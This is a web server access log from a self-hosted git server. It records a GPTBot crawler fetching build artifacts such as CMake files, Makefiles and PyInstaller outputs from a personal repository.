"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10230] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10280] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25621] [Gzip 11.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10659] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10662] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21336] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21337] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10003] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10002] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14725] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14724] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 10656] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" -[17/Feb/2026:14:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11080] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" -[17/Feb/2026:14:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31148] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31149] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 108405] [Gzip 18.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:14:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13319] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" -[17/Feb/2026:14:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 10917] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:14:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:14:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11375] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" -[17/Feb/2026:14:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11111] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" -[17/Feb/2026:14:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" -[17/Feb/2026:14:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11104] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" -[17/Feb/2026:14:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:14:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 153574] [Gzip 31.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:14:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" [Client 